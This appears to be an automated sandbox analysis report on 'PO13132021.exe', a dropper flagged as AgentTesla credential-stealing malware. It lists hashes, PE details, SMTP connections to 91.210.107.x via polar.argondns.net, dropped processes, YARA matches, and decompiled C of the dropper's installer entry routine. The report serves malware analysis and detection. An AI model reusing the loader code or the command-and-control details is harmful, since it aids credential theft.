SHA512:	3309ff4fa38aca1d791683f80de67ed2ab720dab034dcb997e9985623eb57f350959ea2ae5bd542f118b703793630a6002b38356716819ef9c28b0ce704dc5a4
SSDEEP:	12288:cqOdWKrdSUiJruF2ahX/gjTCSxJMbAbYTqLqPqxG9sCQPb45Yxsy:cZYA2W2QX/cTfw0sTOq/9sPbLxsy
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG._...PG..PF.IPG._...PG..sw..PG..VA..PG.Rich.PG.........PE..L.....$_.................d..........a4............@

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x403461
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5F24D6E4 [Sat Aug 1 02:43:48 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	ea4e67a31ace1a72683a99b80cf37830

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 0040A130h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [004080B0h]
call dword ptr [004080C0h]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [0042474Ch], eax
je 00007F1FC9279883h
push ebx
call 00007F1FC927C9FEh
cmp eax, ebx
je 00007F1FC9279879h
push 00000C00h
call eax
mov esi, 004082A0h
push esi
call 00007F1FC927C97Ah
push esi
call dword ptr [004080B8h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007F1FC927985Dh
push 0000000Bh
call 00007F1FC927C9D2h
push 00000009h
call 00007F1FC927C9CBh
push 00000007h
mov dword ptr [00424744h], eax
call 00007F1FC927C9BFh
cmp eax, ebx
je 00007F1FC9279881h
push 0000001Eh
call eax
test eax, eax
je 00007F1FC9279879h
or byte ptr [0042474Fh], 00000040h
push ebp
call dword ptr [00408038h]
push ebx
call dword ptr [00408288h]
mov dword ptr [00424818h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 0041FD10h
call dword ptr [0040816Ch]
push 0040A1ECh

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8438	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2d000	0x6bc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x29c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x623c	0x6400	False	0.65859375	data	6.40257705324	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1274	0x1400	False	0.43359375	data	5.05749598324	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x1a858	0x600	False	0.445963541667	data	4.08975001509	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata	0x25000	0x8000	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x2d000	0x6bc	0x800	False	0.41259765625	data	4.23827605847	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_DIALOG	0x2d100	0x100	data	English	United States
RT_DIALOG	0x2d200	0x11c	data	English	United States
RT_DIALOG	0x2d31c	0x60	data	English	United States
RT_MANIFEST	0x2d37c	0x340	XML 1.0 document, ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
ADVAPI32.dll	RegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
SHELL32.dll	SHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
ole32.dll	IIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
COMCTL32.dll	ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll	SetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
GDI32.dll	SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll	GetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, GetTempFileNameA, RemoveDirectoryA, WriteFile, CreateDirectoryA, GetLastError, CreateProcessA, GlobalLock, GlobalUnlock, CreateThread, lstrcpynA, SetErrorMode, GetDiskFreeSpaceA, lstrlenA, GetCommandLineA, GetVersion, GetWindowsDirectoryA, SetEnvironmentVariableA, GetTempPathA, CopyFileA, GetCurrentProcess, ExitProcess, GetModuleFileNameA, GetFileSize, ReadFile, GetTickCount, Sleep, CreateFileA, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 27, 2021 12:35:08.558293104 CET	49743	587	192.168.2.3	91.210.107.22
Jan 27, 2021 12:35:11.559736013 CET	49743	587	192.168.2.3	91.210.107.22
Jan 27, 2021 12:35:17.591324091 CET	49743	587	192.168.2.3	91.210.107.22
Jan 27, 2021 12:35:29.609376907 CET	49743	587	192.168.2.3	91.210.107.62
Jan 27, 2021 12:35:32.624046087 CET	49743	587	192.168.2.3	91.210.107.62
Jan 27, 2021 12:35:38.640366077 CET	49743	587	192.168.2.3	91.210.107.62
Jan 27, 2021 12:35:50.657453060 CET	49743	587	192.168.2.3	91.210.107.53
Jan 27, 2021 12:35:53.656806946 CET	49743	587	192.168.2.3	91.210.107.53
Jan 27, 2021 12:35:59.673070908 CET	49743	587	192.168.2.3	91.210.107.53
Jan 27, 2021 12:36:11.731405973 CET	49743	587	192.168.2.3	91.210.107.54
Jan 27, 2021 12:36:14.736784935 CET	49743	587	192.168.2.3	91.210.107.54
Jan 27, 2021 12:36:20.745368004 CET	49743	587	192.168.2.3	91.210.107.54
Jan 27, 2021 12:36:32.758579016 CET	49743	587	192.168.2.3	91.210.107.52
Jan 27, 2021 12:36:35.774386883 CET	49743	587	192.168.2.3	91.210.107.52

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 27, 2021 12:33:30.401842117 CET	58361	53	192.168.2.3	8.8.8.8
Jan 27, 2021 12:33:30.450095892 CET	53	58361	8.8.8.8	192.168.2.3
Jan 27, 2021 12:33:31.753947973 CET	63492	53	192.168.2.3	8.8.8.8
Jan 27, 2021 12:33:31.804760933 CET	53	63492	8.8.8.8	192.168.2.3
Jan 27, 2021 12:33:34.602005005 CET	60831	53	192.168.2.3	8.8.8.8
Jan 27, 2021 12:33:34.652759075 CET	53	60831	8.8.8.8	192.168.2.3
Jan 27, 2021 12:33:35.790699959 CET	60100	53	192.168.2.3	8.8.8.8
Jan 27, 2021 12:33:35.841535091 CET	53	60100	8.8.8.8	192.168.2.3
Jan 27, 2021 12:33:37.147110939 CET	53195	53	192.168.2.3	8.8.8.8
Jan 27, 2021 12:33:37.195096016 CET	53	53195	8.8.8.8	192.168.2.3
Jan 27, 2021 12:33:38.458867073 CET	50141	53	192.168.2.3	8.8.8.8
Jan 27, 2021 12:33:38.509751081 CET	53	50141	8.8.8.8	192.168.2.3
Jan 27, 2021 12:33:39.758410931 CET	53023	53	192.168.2.3	8.8.8.8
Jan 27, 2021 12:33:39.808118105 CET	53	53023	8.8.8.8	192.168.2.3
Jan 27, 2021 12:33:40.941373110 CET	49563	53	192.168.2.3	8.8.8.8
Jan 27, 2021 12:33:40.989288092 CET	53	49563	8.8.8.8	192.168.2.3
Jan 27, 2021 12:33:42.166100025 CET	51352	53	192.168.2.3	8.8.8.8
Jan 27, 2021 12:33:42.213928938 CET	53	51352	8.8.8.8	192.168.2.3
Jan 27, 2021 12:33:43.387100935 CET	59349	53	192.168.2.3	8.8.8.8
Jan 27, 2021 12:33:43.444571018 CET	53	59349	8.8.8.8	192.168.2.3
Jan 27, 2021 12:33:44.650142908 CET	57084	53	192.168.2.3	8.8.8.8
Jan 27, 2021 12:33:44.698065996 CET	53	57084	8.8.8.8	192.168.2.3
Jan 27, 2021 12:33:45.778295994 CET	58823	53	192.168.2.3	8.8.8.8
Jan 27, 2021 12:33:45.826289892 CET	53	58823	8.8.8.8	192.168.2.3
Jan 27, 2021 12:33:46.959475994 CET	57568	53	192.168.2.3	8.8.8.8
Jan 27, 2021 12:33:47.009632111 CET	53	57568	8.8.8.8	192.168.2.3
Jan 27, 2021 12:33:58.304991961 CET	50540	53	192.168.2.3	8.8.8.8
Jan 27, 2021 12:33:58.357912064 CET	53	50540	8.8.8.8	192.168.2.3
Jan 27, 2021 12:34:05.511758089 CET	54366	53	192.168.2.3	8.8.8.8
Jan 27, 2021 12:34:05.571175098 CET	53	54366	8.8.8.8	192.168.2.3
Jan 27, 2021 12:34:18.137455940 CET	53034	53	192.168.2.3	8.8.8.8
Jan 27, 2021 12:34:18.207076073 CET	53	53034	8.8.8.8	192.168.2.3
Jan 27, 2021 12:34:19.361601114 CET	57762	53	192.168.2.3	8.8.8.8
Jan 27, 2021 12:34:19.423527956 CET	53	57762	8.8.8.8	192.168.2.3
Jan 27, 2021 12:34:20.439914942 CET	55435	53	192.168.2.3	8.8.8.8
Jan 27, 2021 12:34:20.487991095 CET	53	55435	8.8.8.8	192.168.2.3
Jan 27, 2021 12:34:23.978684902 CET	50713	53	192.168.2.3	8.8.8.8
Jan 27, 2021 12:34:24.039310932 CET	53	50713	8.8.8.8	192.168.2.3
Jan 27, 2021 12:35:04.093718052 CET	56132	53	192.168.2.3	8.8.8.8
Jan 27, 2021 12:35:04.145981073 CET	53	56132	8.8.8.8	192.168.2.3
Jan 27, 2021 12:35:06.202208996 CET	58987	53	192.168.2.3	8.8.8.8
Jan 27, 2021 12:35:06.265650034 CET	53	58987	8.8.8.8	192.168.2.3
Jan 27, 2021 12:35:08.458524942 CET	56579	53	192.168.2.3	8.8.8.8
Jan 27, 2021 12:35:08.517349958 CET	53	56579	8.8.8.8	192.168.2.3
Jan 27, 2021 12:36:21.292306900 CET	60633	53	192.168.2.3	8.8.8.8
Jan 27, 2021 12:36:21.348989964 CET	53	60633	8.8.8.8	192.168.2.3
Jan 27, 2021 12:36:21.976433992 CET	61292	53	192.168.2.3	8.8.8.8
Jan 27, 2021 12:36:22.024369001 CET	53	61292	8.8.8.8	192.168.2.3
Jan 27, 2021 12:36:22.723779917 CET	63619	53	192.168.2.3	8.8.8.8
Jan 27, 2021 12:36:22.771917105 CET	53	63619	8.8.8.8	192.168.2.3
Jan 27, 2021 12:36:23.305397034 CET	64938	53	192.168.2.3	8.8.8.8
Jan 27, 2021 12:36:23.362088919 CET	53	64938	8.8.8.8	192.168.2.3
Jan 27, 2021 12:36:23.980076075 CET	61946	53	192.168.2.3	8.8.8.8
Jan 27, 2021 12:36:24.041855097 CET	53	61946	8.8.8.8	192.168.2.3
Jan 27, 2021 12:36:24.724802971 CET	64910	53	192.168.2.3	8.8.8.8
Jan 27, 2021 12:36:24.783817053 CET	53	64910	8.8.8.8	192.168.2.3
Jan 27, 2021 12:36:25.531107903 CET	52123	53	192.168.2.3	8.8.8.8
Jan 27, 2021 12:36:25.582056046 CET	53	52123	8.8.8.8	192.168.2.3
Jan 27, 2021 12:36:26.658972979 CET	56130	53	192.168.2.3	8.8.8.8
Jan 27, 2021 12:36:26.718672037 CET	53	56130	8.8.8.8	192.168.2.3
Jan 27, 2021 12:36:28.413674116 CET	56338	53	192.168.2.3	8.8.8.8
Jan 27, 2021 12:36:28.470185995 CET	53	56338	8.8.8.8	192.168.2.3
Jan 27, 2021 12:36:28.968753099 CET	59420	53	192.168.2.3	8.8.8.8
Jan 27, 2021 12:36:29.025866032 CET	53	59420	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 27, 2021 12:35:08.458524942 CET	192.168.2.3	8.8.8.8	0x5157	Standard query (0)	polar.argondns.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Jan 27, 2021 12:35:08.517349958 CET	8.8.8.8	192.168.2.3	0x5157	No error (0)	polar.argondns.net	91.210.107.22	A (IP address)	IN (0x0001)
Jan 27, 2021 12:35:08.517349958 CET	8.8.8.8	192.168.2.3	0x5157	No error (0)	polar.argondns.net	91.210.107.62	A (IP address)	IN (0x0001)
Jan 27, 2021 12:35:08.517349958 CET	8.8.8.8	192.168.2.3	0x5157	No error (0)	polar.argondns.net	91.210.107.53	A (IP address)	IN (0x0001)
Jan 27, 2021 12:35:08.517349958 CET	8.8.8.8	192.168.2.3	0x5157	No error (0)	polar.argondns.net	91.210.107.54	A (IP address)	IN (0x0001)
Jan 27, 2021 12:35:08.517349958 CET	8.8.8.8	192.168.2.3	0x5157	No error (0)	polar.argondns.net	91.210.107.52	A (IP address)	IN (0x0001)

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: PO13132021.exe PID: 6960 Parent PID: 5792

General

Start time:	12:33:35
Start date:	27/01/2021
Path:	C:\Users\user\Desktop\PO13132021.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\PO13132021.exe'
Imagebase:	0x400000
File size:	725929 bytes
MD5 hash:	7C4C3A12F367DCD154ACCCE5948EBAEB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: ioqwel.exe PID: 6996 Parent PID: 6960

General

Start time:	12:33:36
Start date:	27/01/2021
Path:	C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe C:\Users\user\AppData\Local\Temp\Nla\zfngholtp.s
Imagebase:	0xab0000
File size:	893608 bytes
MD5 hash:	C56B5F0201A3B3DE53E561FE76912BFD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.213456226.00000000032F0000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 5%, Metadefender, Browse Detection: 0%, ReversingLabs
Reputation:	moderate

Chronological Activities

Analysis Process: tpiyon2.exe PID: 7028 Parent PID: 6996

General

Start time:	12:33:37
Start date:	27/01/2021
Path:	C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe C:\Users\user\AppData\Local\Temp\Nla\zfngholtp.s
Imagebase:	0x400000
File size:	893608 bytes
MD5 hash:	535DD1329AEF11BF4654B3270F026D5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.587931278.0000000003E01000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.583608219.0000000000CA6000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.582750259.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.583897205.0000000002812000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000001.209476830.0000000000414000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.586869289.0000000002E01000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.586869289.0000000002E01000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.583855776.00000000027D0000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 21%, ReversingLabs
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: PO13132021.exe PID: 6960 Parent PID: 5792 PO13132021.exeCOMMON

Executed Functions

Function 00403461, Relevance: 91.4, APIs: 33, Strings: 19, Instructions: 366
stringcomfileCOMMON

Download Yara Rule

C-Code - Quality: 85%

			_entry_() {
				signed int _t42;
				intOrPtr* _t47;
				CHAR* _t51;
				char* _t53;
				CHAR* _t55;
				void* _t59;
				intOrPtr _t61;
				int _t62;
				int _t65;
				signed int _t66;
				int _t67;
				signed int _t69;
				void* _t93;
				signed int _t109;
				void* _t112;
				void* _t117;
				intOrPtr* _t118;
				char _t121;
				signed int _t140;
				signed int _t141;
				int _t149;
				void* _t150;
				intOrPtr* _t152;
				CHAR* _t155;
				CHAR* _t156;
				void* _t158;
				char* _t159;
				void* _t162;
				void* _t163;
				char _t188;

				 *(_t163 + 0x18) = 0;
				 *((intOrPtr*)(_t163 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t163 + 0x20) = 0;
				 *(_t163 + 0x14) = 0x20;
				SetErrorMode(0x8001); // executed
				_t42 = GetVersion() & 0xbfffffff;
				 *0x42474c = _t42;
				if(_t42 != 6) {
					_t118 = E00406631(0);
					if(_t118 != 0) {
						 *_t118(0xc00);
					}
				}
				_t155 = "UXTHEME";
				do {
					E004065C3(_t155); // executed
					_t155 =  &(_t155[lstrlenA(_t155) + 1]);
				} while ( *_t155 != 0);
				E00406631(0xb);
				 *0x424744 = E00406631(9);
				_t47 = E00406631(7);
				if(_t47 != 0) {
					_t47 =  *_t47(0x1e);
					if(_t47 != 0) {
						 *0x42474f =  *0x42474f | 0x00000040;
					}
				}
				__imp__#17(_t158);
				__imp__OleInitialize(0); // executed
				 *0x424818 = _t47;
				SHGetFileInfoA(0x41fd10, 0, _t163 + 0x38, 0x160, 0); // executed
				E00406228(0x423f40, "NSIS Error");
				_t51 = GetCommandLineA();
				_t159 = "\"C:\\Users\\hardz\\Desktop\\PO13132021.exe\" ";
				E00406228(_t159, _t51);
				 *0x424740 = 0x400000;
				_t53 = _t159;
				if("\"C:\\Users\\hardz\\Desktop\\PO13132021.exe\" " == 0x22) {
					 *(_t163 + 0x14) = 0x22;
					_t53 =  &M0042A001;
				}
				_t55 = CharNextA(E00405BEB(_t53,  *(_t163 + 0x14)));
				 *(_t163 + 0x1c) = _t55;
				while(1) {
					_t121 =  *_t55;
					_t171 = _t121;
					if(_t121 == 0) {
						break;
					}
					__eflags = _t121 - 0x20;
					if(_t121 != 0x20) {
						L13:
						__eflags =  *_t55 - 0x22;
						 *(_t163 + 0x14) = 0x20;
						if( *_t55 == 0x22) {
							_t55 =  &(_t55[1]);
							__eflags = _t55;
							 *(_t163 + 0x14) = 0x22;
						}
						__eflags =  *_t55 - 0x2f;
						if( *_t55 != 0x2f) {
							L25:
							_t55 = E00405BEB(_t55,  *(_t163 + 0x14));
							__eflags =  *_t55 - 0x22;
							if(__eflags == 0) {
								_t55 =  &(_t55[1]);
								__eflags = _t55;
							}
							continue;
						} else {
							_t55 =  &(_t55[1]);
							__eflags =  *_t55 - 0x53;
							if( *_t55 != 0x53) {
								L20:
								__eflags =  *_t55 - ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC");
								if( *_t55 != ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC")) {
									L24:
									__eflags =  *((intOrPtr*)(_t55 - 2)) - ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=");
									if( *((intOrPtr*)(_t55 - 2)) == ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=")) {
										 *((char*)(_t55 - 2)) = 0;
										__eflags =  &(_t55[2]);
										E00406228("C:\\Users\\hardz\\AppData\\Local\\Temp",  &(_t55[2]));
										L30:
										_t156 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
										GetTempPathA(0x400, _t156);
										_t59 = E00403430(_t171);
										_t172 = _t59;
										if(_t59 != 0) {
											L33:
											DeleteFileA("1033"); // executed
											_t61 = E00402EF1(_t174,  *(_t163 + 0x20)); // executed
											 *((intOrPtr*)(_t163 + 0x10)) = _t61;
											if(_t61 != 0) {
												L43:
												ExitProcess(); // executed
												__imp__OleUninitialize(); // executed
												_t184 =  *((intOrPtr*)(_t163 + 0x10));
												if( *((intOrPtr*)(_t163 + 0x10)) == 0) {
													__eflags =  *0x4247f4;
													if( *0x4247f4 == 0) {
														L67:
														_t62 =  *0x42480c;
														__eflags = _t62 - 0xffffffff;
														if(_t62 != 0xffffffff) {
															 *(_t163 + 0x14) = _t62;
														}
														ExitProcess( *(_t163 + 0x14));
													}
													_t65 = OpenProcessToken(GetCurrentProcess(), 0x28, _t163 + 0x18);
													__eflags = _t65;
													_t149 = 2;
													if(_t65 != 0) {
														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t163 + 0x24);
														 *(_t163 + 0x38) = 1;
														 *(_t163 + 0x44) = _t149;
														AdjustTokenPrivileges( *(_t163 + 0x2c), 0, _t163 + 0x28, 0, 0, 0);
													}
													_t66 = E00406631(4);
													__eflags = _t66;
													if(_t66 == 0) {
														L65:
														_t67 = ExitWindowsEx(_t149, 0x80040002);
														__eflags = _t67;
														if(_t67 != 0) {
															goto L67;
														}
														goto L66;
													} else {
														_t69 =  *_t66(0, 0, 0, 0x25, 0x80040002);
														__eflags = _t69;
														if(_t69 == 0) {
															L66:
															E0040140B(9);
															goto L67;
														}
														goto L65;
													}
												}
												E00405944( *((intOrPtr*)(_t163 + 0x10)), 0x200010);
												ExitProcess(2);
											}
											if( *0x424760 == 0) {
												L42:
												 *0x42480c =  *0x42480c | 0xffffffff;
												 *(_t163 + 0x18) = E00403A3B( *0x42480c);
												goto L43;
											}
											_t152 = E00405BEB(_t159, 0);
											if(_t152 < _t159) {
												L39:
												_t181 = _t152 - _t159;
												 *((intOrPtr*)(_t163 + 0x10)) = "Error launching installer";
												if(_t152 < _t159) {
													_t150 = E004058AF(_t184);
													lstrcatA(_t156, "~nsu");
													if(_t150 != 0) {
														lstrcatA(_t156, "A");
													}
													lstrcatA(_t156, ".tmp");
													_t161 = "C:\\Users\\hardz\\Desktop";
													if(lstrcmpiA(_t156, "C:\\Users\\hardz\\Desktop") != 0) {
														_push(_t156);
														if(_t150 == 0) {
															E00405892();
														} else {
															E00405815();
														}
														SetCurrentDirectoryA(_t156);
														_t188 = "C:\\Users\\hardz\\AppData\\Local\\Temp"; // 0x43
														if(_t188 == 0) {
															E00406228("C:\\Users\\hardz\\AppData\\Local\\Temp", _t161);
														}
														E00406228(0x425000,  *(_t163 + 0x1c));
														_t136 = "A";
														_t162 = 0x1a;
														 *0x425400 = "A";
														do {
															E004062BB(0, 0x41f910, _t156, 0x41f910,  *((intOrPtr*)( *0x424754 + 0x120)));
															DeleteFileA(0x41f910);
															if( *((intOrPtr*)(_t163 + 0x10)) != 0 && CopyFileA("C:\\Users\\hardz\\Desktop\\PO13132021.exe", 0x41f910, 1) != 0) {
																E00406007(_t136, 0x41f910, 0);
																E004062BB(0, 0x41f910, _t156, 0x41f910,  *((intOrPtr*)( *0x424754 + 0x124)));
																_t93 = E004058C7(0x41f910);
																if(_t93 != 0) {
																	CloseHandle(_t93);
																	 *((intOrPtr*)(_t163 + 0x10)) = 0;
																}
															}
															 *0x425400 =  *0x425400 + 1;
															_t162 = _t162 - 1;
														} while (_t162 != 0);
														E00406007(_t136, _t156, 0);
													}
													goto L43;
												}
												 *_t152 = 0;
												_t153 = _t152 + 4;
												if(E00405CAE(_t181, _t152 + 4) == 0) {
													goto L43;
												}
												E00406228("C:\\Users\\hardz\\AppData\\Local\\Temp", _t153);
												E00406228("C:\\Users\\hardz\\AppData\\Local\\Temp\\Nla", _t153);
												 *((intOrPtr*)(_t163 + 0x10)) = 0;
												goto L42;
											}
											_t109 = (( *0x40a1bf << 0x00000008 |  *0x40a1be) << 0x00000008 |  *0x40a1bd) << 0x00000008 | " _?=";
											while( *_t152 != _t109) {
												_t152 = _t152 - 1;
												if(_t152 >= _t159) {
													continue;
												}
												goto L39;
											}
											goto L39;
										}
										GetWindowsDirectoryA(_t156, 0x3fb);
										lstrcatA(_t156, "\\Temp");
										_t112 = E00403430(_t172);
										_t173 = _t112;
										if(_t112 != 0) {
											goto L33;
										}
										GetTempPathA(0x3fc, _t156);
										lstrcatA(_t156, "Low");
										SetEnvironmentVariableA("TEMP", _t156);
										SetEnvironmentVariableA("TMP", _t156);
										_t117 = E00403430(_t173);
										_t174 = _t117;
										if(_t117 == 0) {
											goto L43;
										}
										goto L33;
									}
									goto L25;
								}
								_t140 = _t55[4];
								__eflags = _t140 - 0x20;
								if(_t140 == 0x20) {
									L23:
									_t15 = _t163 + 0x20;
									 *_t15 =  *(_t163 + 0x20) | 0x00000004;
									__eflags =  *_t15;
									goto L24;
								}
								__eflags = _t140;
								if(_t140 != 0) {
									goto L24;
								}
								goto L23;
							}
							_t141 = _t55[1];
							__eflags = _t141 - 0x20;
							if(_t141 == 0x20) {
								L19:
								 *0x424800 = 1;
								goto L20;
							}
							__eflags = _t141;
							if(_t141 != 0) {
								goto L20;
							}
							goto L19;
						}
					} else {
						goto L12;
					}
					do {
						L12:
						_t55 =  &(_t55[1]);
						__eflags =  *_t55 - 0x20;
					} while ( *_t55 == 0x20);
					goto L13;
				}
				goto L30;
			}

0x00403471
0x00403475
0x0040347d
0x00403481
0x00403486
0x00403492
0x0040349b
0x004034a0
0x004034a3
0x004034aa
0x004034b1
0x004034b1
0x004034aa
0x004034b3
0x004034b8
0x004034b9
0x004034c5
0x004034c9
0x004034cf
0x004034dd
0x004034e2
0x004034e9
0x004034ed
0x004034f1
0x004034f3
0x004034f3
0x004034f1
0x004034fb
0x00403502
